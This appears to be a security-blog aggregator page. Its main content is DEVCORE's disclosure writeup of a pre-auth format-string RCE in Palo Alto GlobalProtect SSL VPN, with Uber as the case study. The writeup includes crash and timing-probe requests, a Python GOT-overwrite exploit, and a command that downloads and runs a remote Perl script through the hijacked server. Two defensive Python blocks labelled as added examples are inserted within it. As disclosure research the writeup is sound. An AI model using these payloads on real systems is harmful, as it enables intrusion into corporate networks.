Aggregator
Basic ROP learning
I recently started getting into pwn; after working through the Baize (白泽) beginner OJ I began learning the rest on my own. I saw the three basic ROP challenges recommended by atum, so I practised them to study the approach and summarise what I learned. While searching for the challenges online I found that vss has basically vanished... After some effort I finally found it, and so that later readers can find the challenges quickly I have uploaded all three together.
Using the PHP Trait feature to bypass D-Shield (D盾) detection
While helping my company review code, I came across a rather fun PHP feature and, on a whim, wondered whether it could bypass D-Shield. Unexpectedly, it worked.
Recalling the story of Foxmail's built-in full-text search, hence this post
CVE-2019-5782: Exploiting the "Inappropriate implementation in V8" vulnerability
The global cyber security industry landscape as seen through the 58 companies selected by a US cyber security ETF
Application Protection Report 2019, Intro Episode: Why Application Security?
[Closed] DEVCORE is hiring an Administrative Specialist
DEVCORE is about to turn seven. Over the years we have continuously researched advanced attack techniques, provided high-quality penetration testing services to many clients, and become one of the security partners our clients trust most. In 2017 we became the first local vendor in Taiwan to offer red team assessment services; using a no-holds-barred hacker mindset we have carried out the most realistic and comprehensive attack exercises for e-commerce, government and financial clients, accumulating a wealth of experience and case studies and becoming the most experienced red team service provider in Taiwan.
In 2015 we publicly recruited an administrative and cashier staff member. After rounds of résumé screening, written tests and interviews, we found an experienced and trustworthy life hacker who became our strongest logistics partner. But as the team has grown, business volume has increased substantially and duties have become more specialised, the many tasks of the administrative department can no longer be handled by a single person.
So this year we are again publicly recruiting administrative staff, hoping to find an Administrative Specialist to expand our logistics capacity, strengthen DEVCORE's team capability, and let us keep providing enterprises with the best security services.
We would very much like you to join us. If you are interested in becoming a member of DEVCORE, please see the position details below:
Job description
- General administrative work 50%
  - Reception, e.g. answering phones, receiving visitors
  - Document handling, e.g. mail, courier services
  - File management, e.g. scanning business cards and contracts, adjusting template file formats
  - Information gathering, e.g. looking up data for various company business needs
- General affairs 20%
  - Purchasing office supplies
  - Maintaining the office environment
- Procurement 15%
  - Equipment procurement management
  - Service vendor management
- HR work 5%
  - Insurance matters, e.g. group insurance, travel inconvenience insurance
  - Business travel, e.g. booking transport tickets, visa applications
  - Arranging training
- Other tasks assigned by management 10%
Working hours: 10:00 - 18:00
Location: 10F, No. 168, Fuxing N. Rd., Zhongshan Dist., Taipei City (about a 3-minute walk from Exit 8 of MRT Nanjing Fuxing Station)
Preferred personality traits
- Careful and rigorous, able to patiently handle tedious routine work.
- Proactive: notices the details we missed and exceeds the bar we expect.
- Good at communicating and listening, able to empathise with others and find common ground.
- Strong logical thinking, able to convey your ideas in a plain, clear and well-organised way.
- Good time management, completing each assignment efficiently according to task priority.
- Willing to take on challenges and able to solve problems, working hard to overcome unknown difficulties.
- At least three years of administrative work experience required
- Proficient with Google Sheets, able to write spreadsheet formulas independently
- Accustomed to using cloud services such as Google Drive, Dropbox or others
- You have used a project management system such as Trello, Basecamp, Redmine or others
  You will use a project management system to manage day-to-day tasks.
- You are a Mac user
  Your future computer will be a Mac; we hope you can get up to speed with it as quickly as possible.
- You are a life hacker
  You don't need to be able to code, but you habitually observe patterns in everyday life and find ways to use them to solve problems efficiently.
- You will work in an open office environment
- You will have an Aeron ergonomic chair
- Drinks (plus a coffee machine) and snacks are restocked weekly to keep you in good spirits
- The company provides a dart machine for venting your grievances against management
We care about the physical and mental health of every colleague; please see the following benefits:
- Leave benefits
  - Annual leave for the current year can be taken in advance from your first day
  - Five days of fully paid sick leave per year
- Bonus benefits
  - Festival bonuses (Lunar New Year, Dragon Boat Festival, Mid-Autumn Festival)
  - Birthday bonus
  - Wedding and funeral allowances
- Leisure benefits
  - Company trips
  - Relaxation massages
  - Team building
- Food benefits
  - Snacks and drinks
  - Staff dinners
- Health benefits
  - Employee health check-ups
  - Sports centre gym vouchers
- Learning benefits
  - Internal training
  - External courses
- Other
  - A professional team
  - A flat organisation
  - An open communication culture
Salary: NT$34,000 - 40,000 (14 months' salary guaranteed per year)
How to apply
- Please send your résumé in PDF format to [email protected]
- Subject line format: [應徵] 行政專員 followed by your name (example: [應徵] 行政專員 王小美)
- Please keep your résumé to two pages or fewer; it must include at least the following:
  - Basic information
  - Education
  - Work experience
  - Community activities
  - Notable achievements
  - MBTI personality test result (test page)
We will contact you within two weeks. The recruitment process consists of three stages in order: document review, an online test, and an interview. The second-stage online test will begin in mid-August at the earliest; please be patient. As we are rather busy at the moment, please direct any questions about the application by email only; we apologise for the inconvenience.
We chose to publish this opening on our blog first in the hope that you are also interested in information security and, even without a technical background, want to contribute to security in Taiwan. Either way, thank you for writing to us, and we look forward to your joining!
CyBRICS CTF Samizdat Writeup
I only solved this challenge after the competition ended, which is a pity, but the challenge itself is quite interesting, so here is a writeup.
(If only I had got up earlier to work on it
Bypassing a WAF with Transfer-Encoding: Chunked in practice
In Conversation: It's Never Too Late
Linux static_key internals
MLSRC invites you to the OGeek Cyber Security Challenge | 600,000 in prize money to attract top security talent and support young researchers
Downloaded FaceApp? Here’s How Your Privacy Is Now Affected
If you’ve been on social media recently, you’ve probably seen some people in your feed posting images of themselves looking...
The post Downloaded FaceApp? Here’s How Your Privacy Is Now Affected appeared first on McAfee Blog.
The Serverless Security Shift
qwb growupjs & wctf independence_day writeup
Algorithm problems in practice: large-scale IP blacklist matching | a quiet share from Qi'an (岂安)
2018 Application Protection Report Podcast Series
Palo Alto GlobalProtect security advisory
During one of our red team assessments we found that the target's Palo Alto GlobalProtect had a format string vulnerability. Through it, the SSL VPN server can be taken over and used as a foothold into the corporate intranet.
After reporting to the vendor, we learned that this is a known vulnerability that had already been silently fixed, so it has no CVE number. Based on our analysis, the affected versions are listed below; users are advised to update to the latest version as soon as possible to avoid being attacked.
- Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
- Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
- Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3
9.x and 7.0.x are not affected.
Details
We also used this vulnerability to successfully take control of Uber's VPN server. For the full technical details, please see our Advisory: https://devco.re/blog/2019/07/17/attacking-ssl-vpn-part-1-PreAuth-RCE-on-Palo-Alto-GlobalProtect-with-Uber-as-case-study/
Note
This will be a series of posts on our SSL VPN research, expected to run to three parts. It is also a small part of our research team's talk this year at Black Hat USA and DEFCON, "Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs". Stay tuned!
Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!
Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_)
SSL VPNs protect corporate assets from Internet exposure, but what if the SSL VPNs themselves are vulnerable? They are exposed to the Internet and trusted to reliably guard the only way into your intranet. Once the SSL VPN server is compromised, attackers can infiltrate your intranet and even take over all users connecting to the SSL VPN server! Because of this importance, over the past several months we started new research on the security of leading SSL VPN products.
We plan to publish our results in 3 articles. We put this one first because we think it is an interesting story and very suitable as an appetizer for our Black Hat USA and DEFCON talk:
- Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs!
Don’t worry about the spoilers, this story is not included in our BHUSA/DEFCON talks.
In our upcoming presentations, we will provide more hard-core exploitation and crazy bug chains to hack into your SSL VPN, from how we jailbroke the appliances to which attack vectors we focused on. We will also demonstrate gaining a root shell from the only exposed HTTPS port, covertly weaponizing the server against its owner, and abusing a hidden feature to take over all VPN clients! So please look forward to it ;)
The story
In this article, we would like to talk about the vulnerability in Palo Alto SSL VPN. Palo Alto calls its SSL VPN product line GlobalProtect. You can easily identify the GlobalProtect service via the 302 redirection to /global-protect/login.esp on the web root!
We accidentally discovered the vulnerability during our Red Team assessment services. At first, we thought it was a 0day. However, we failed to reproduce it on a remote server running the latest version of GlobalProtect, so we began to suspect it was a known vulnerability.
We searched all over the Internet but could not find anything: no prior public RCE exploit[1], no official advisory containing anything similar, and no CVE. So we believed this must be a silently fixed 1-day!
[1] There are some earlier exploits against the PAN-OS management interface, such as CVE-2017-15944 and the excellent TROOPERS16 paper by @_fel1x, but unfortunately they do not cover GlobalProtect, and the management interface is only exposed on the LAN port.
The bug
The bug is very straightforward: a simple format string vulnerability with no authentication required! The sslmgr is the SSL gateway handling the SSL handshake between the server and clients. The daemon is exposed through the Nginx reverse proxy and can be reached via the path /sslmgr.
$ curl https://global-protect/sslmgr
<?xml version="1.0" encoding="UTF-8" ?>
<clientcert-response>
<status>error</status>
<msg>Invalid parameters</msg>
</clientcert-response>

During parameter extraction, the daemon searches for the string scep-profile-name and passes its value as the snprintf format used to fill the buffer. That leads to the format string attack. You can crash the service simply with %n!
POST /sslmgr HTTP/1.1
Host: global-protect
Content-Length: 36

scep-profile-name=%n%n%n%n%n...

Affected versions
According to our survey, all GlobalProtect releases before July 2018 are vulnerable! Here is the list of affected versions:
- Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
- Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
- Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3
The 9.x and 7.0.x series are not affected by this vulnerability.
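The affected ranges above (and the identical list in the DEVCORE advisory earlier on this page) are easy to misread when checking an inventory by hand, so here is an added example, not DEVCORE's or Palo Alto's code, that encodes them as data and classifies version strings against them. The sample inventory, including the hypothetical "8.2.0" branch used to show the "not covered" case, is constructed for the example.

```python
# Added example (not DEVCORE's or Palo Alto's code): classify GlobalProtect version
# strings against the affected ranges listed in the advisory.
from typing import Dict, List, Optional, Tuple

# First patched release of each affected branch, as given in the advisory:
# 7.1.x < 7.1.19, 8.0.x < 8.0.12 and 8.1.x < 8.1.3 are vulnerable.
FIRST_FIXED_PATCH: Dict[Tuple[int, int], int] = {
    (7, 1): 19,
    (8, 0): 12,
    (8, 1): 3,
}


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse 'major.minor.patch'; anything else is rejected rather than guessed."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised GlobalProtect version: {text!r}")
    major, minor, patch = (int(p) for p in parts)
    return major, minor, patch


def is_affected(text: str) -> Optional[bool]:
    """True  -> inside an affected range (needs upgrade)
    False -> a fixed release, or a branch the advisory says is not affected (9.x, 7.0.x)
    None  -> branch not covered by the advisory; confirm with the vendor instead of guessing"""
    major, minor, patch = parse_version(text)
    if major == 9 or (major, minor) == (7, 0):
        return False
    first_fixed = FIRST_FIXED_PATCH.get((major, minor))
    if first_fixed is None:
        return None
    return patch < first_fixed


def triage(inventory: List[str]) -> Dict[str, List[str]]:
    """Sort an inventory of version strings into upgrade buckets."""
    report: Dict[str, List[str]] = {"affected": [], "fixed": [], "unknown": []}
    for version in inventory:
        verdict = is_affected(version)
        if verdict is True:
            report["affected"].append(version)
        elif verdict is False:
            report["fixed"].append(version)
        else:
            report["unknown"].append(version)
    return report


if __name__ == "__main__":
    # Constructed sample inventory. 8.0.6 is the version named in the case study;
    # "8.2.0" is a hypothetical branch used only to exercise the "unknown" bucket.
    sample = ["8.0.6", "8.0.12", "8.1.2", "8.1.3", "7.1.18", "7.1.19", "7.0.5", "9.0.1", "8.2.0"]
    for bucket, versions in triage(sample).items():
        print(f"{bucket}: {', '.join(versions) or '-'}")
```

The three-way result is deliberate: a branch the advisory never mentions is reported as unknown rather than silently treated as safe, which is the mistake a simple "is it below 8.1.3?" comparison would make.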
How to verify the bug
Although we know where the bug is, verifying the vulnerability is still not easy. The format string produces no output, so we cannot obtain any address leak to confirm the bug, and crashing the service is never our first choice[1]. To avoid crashes, we needed a way to verify the vulnerability elegantly!
By reading the snprintf manual, we chose %c as our gadget! When a width is given before the conversion, such as %9999999c, snprintf pads the output that many times internally. We observe the response time for large widths to verify this vulnerability!
$ time curl -s -d 'scep-profile-name=%9999999c' https://global-protect/sslmgr >/dev/null
real 0m1.721s
user 0m0.037s
sys 0m0.005s
$ time curl -s -d 'scep-profile-name=%99999999c' https://global-protect/sslmgr >/dev/null
real 0m2.051s
user 0m0.035s
sys 0m0.012s
$ time curl -s -d 'scep-profile-name=%999999999c' https://global-protect/sslmgr >/dev/null
real 0m5.324s
user 0m0.021s
sys 0m0.018s

As you can see, the response time increases with the width of %c. So, from the time difference, we can identify a vulnerable SSL VPN elegantly!
[1] Although there is a watchdog monitoring the sslmgr daemon, it’s still improper to crash a service!
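From the defender's side, both the crash payload in "The bug" and the %c timing probe in this section are visible in the request body before they ever reach sslmgr, and a reverse proxy or WAF is the natural place to catch them. The following is an added example, not DEVCORE's code, of detection logic over constructed sample requests: it assumes raw, not-yet-percent-decoded form bodies are available from the proxy log (an assumption about the logging setup, not something the article describes) and flags printf-style directives in any parameter value, since a format string exploit may spread its directives across several parameters.

```python
# Added example (not DEVCORE's code): flag /sslmgr request bodies that carry
# printf-style directives. Assumes raw (undecoded) form bodies from a proxy/WAF log.
import re
from typing import Dict, List, Tuple

# %n-family directives write to memory; %N$ selects an argument by position;
# %<width>c with a huge width is the timing probe described in the article;
# %p leaks stack contents. Length modifiers (h, hh, l, ll) may precede n.
WRITE_DIRECTIVE = re.compile(r"%\d*\$?(?:hh|h|ll|l)?n")
POSITIONAL_ARG = re.compile(r"%\d+\$")
WIDE_PADDING = re.compile(r"%(\d{6,})c")
POINTER_LEAK = re.compile(r"%\d*\$?p")


def split_raw_params(body: str) -> List[Tuple[str, str]]:
    """Split a form body on '&' and '=' WITHOUT percent-decoding.
    Decoding first would turn the '%99' in '%9999999c' into a single byte and hide
    the directive. In a well-formed body a literal '%' is always sent as '%25', so
    any other '%' sequence is already suspicious. Duplicate keys are kept."""
    pairs = []
    for chunk in body.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs.append((key, value))
    return pairs


def scan_body(body: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious directive class found in any parameter."""
    findings = []
    for key, value in split_raw_params(body):
        if WRITE_DIRECTIVE.search(value):
            findings.append({"param": key, "reason": "memory-write directive (%n family)"})
        if POSITIONAL_ARG.search(value):
            findings.append({"param": key, "reason": "positional argument selector (%N$)"})
        wide = WIDE_PADDING.search(value)
        if wide:
            findings.append({"param": key, "reason": f"padding/timing probe (%{wide.group(1)}c)"})
        if POINTER_LEAK.search(value):
            findings.append({"param": key, "reason": "pointer leak directive (%p)"})
    return findings


def scan_requests(records: List[Tuple[str, str]]) -> List[Dict[str, object]]:
    """records are (path, raw_body) tuples; only /sslmgr is in scope for this bug."""
    alerts = []
    for path, body in records:
        if path != "/sslmgr":
            continue
        findings = scan_body(body)
        if findings:
            alerts.append({"path": path, "reasons": [f["reason"] for f in findings]})
    return alerts


# Constructed sample traffic (not captured from any real system).
SAMPLE_REQUESTS = [
    ("/sslmgr", "scep-profile-name=%n%n%n%n%n"),                     # crash payload from the article
    ("/sslmgr", "scep-profile-name=%9999999c"),                      # timing probe from the article
    ("/sslmgr", "scep-profile-name=corp-scep&host-id=abc"),          # benign
    ("/global-protect/login.esp", "user=alice&passwd=100%25done"),   # '%25' is a normal escape
]

if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_REQUESTS):
        print(alert)
```

The important detail is the order of operations: matching on the decoded value, as many WAF rule sets do by default, would hide the timing probe, because `%99` is a valid percent-escape and gets consumed before the pattern runs.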
The exploitation
Once we can verify the bug, exploitation is easy. To exploit the binary successfully, we first need to determine the exact version. We can tell versions apart by the Last-Modified header, such as that of /global-protect/portal/css/login.css on 8.x and of /images/logo_pan_158.gif on 7.x!
$ curl -s -I https://sslvpn/global-protect/portal/css/login.css | grep Last-Modified
Last-Modified: Sun, 10 Sep 2017 16:48:23 GMT

With a specific version identified, we can write our exploit. We simply overwrite the pointer of strlen in the Global Offset Table (GOT) with the Procedure Linkage Table (PLT) entry of system. Here is the PoC:
#!/usr/bin/python
import requests
from pwn import *

url = "https://sslvpn/sslmgr"
cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt"
strlen_GOT = 0x667788 # change me
system_plt = 0x445566 # change me

fmt = '%70$n'
fmt += '%' + str((system_plt>>16)&0xff) + 'c'
fmt += '%32$hn'
fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c'
fmt += '%24$hn'
for i in range(40,60):
    fmt += '%'+str(i)+'$p'

data = "scep-profile-name="
data += p32(strlen_GOT)[:-1]
data += "&appauthcookie="
data += p32(strlen_GOT+2)[:-1]
data += "&host-id="
data += p32(strlen_GOT+4)[:-1]
data += "&user-email="
data += fmt
data += "&appauthcookie="
data += cmd

r = requests.post(url, data=data)

Once the overwrite is done, the sslmgr becomes our webshell and we can execute commands via:
$ curl -d 'scep-profile-name=curl orange.tw/bc.pl | perl -' https://global-protect/sslmgr

We reported this bug to Palo Alto via their report form. However, we got the following reply:
Hello Orange,
Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know.
Kind regards
Hmmm, so it seems this vulnerability is known to Palo Alto, but not yet to the world!
The case study
After we became aware this was not a 0day, we surveyed all Palo Alto SSL VPNs around the world to see whether any large corporations were using vulnerable GlobalProtect, and Uber was one of them! From our survey, Uber owns about 22 servers running GlobalProtect around the world; here we take vpn.awscorp.uberinternal.com as an example!
From the domain name, we guessed Uber uses the BYOL image from the AWS Marketplace. From the login page, Uber appeared to be running an 8.x version, and we could narrow down the candidate versions using the supported version list on the Marketplace overview page:
- 8.0.3
- 8.0.6
- 8.0.8
- 8.0.9
- 8.1.0
Finally, we figured out the version: it was 8.0.6, and we got the shell back!
Uber responded very quickly, took the right steps to fix the vulnerability, and gave us a detailed explanation of the bounty decision:
Hey @orange — we wanted to provide a little more context on the decision for this bounty. During our internal investigation, we found that the Palo Alto SSL VPN is not the same as the primary VPN which is used by the majority of our employees.
Additionally, we hosted the Palo Alto SSL VPN in AWS as opposed to our core infrastructure; as such, this would not have been able to access any of our internal infrastructure or core services. For these reasons, we determined that while it was an unauthenticated RCE, the overall impact and positional advantage of this was low. Thanks again for an awesome report!
It's a fair decision. It's always a great time communicating with Uber and reporting to their bug bounty program. We don't care about the bounty that much, because we enjoy the whole research process and giving back to the security community! Nothing can be better than this!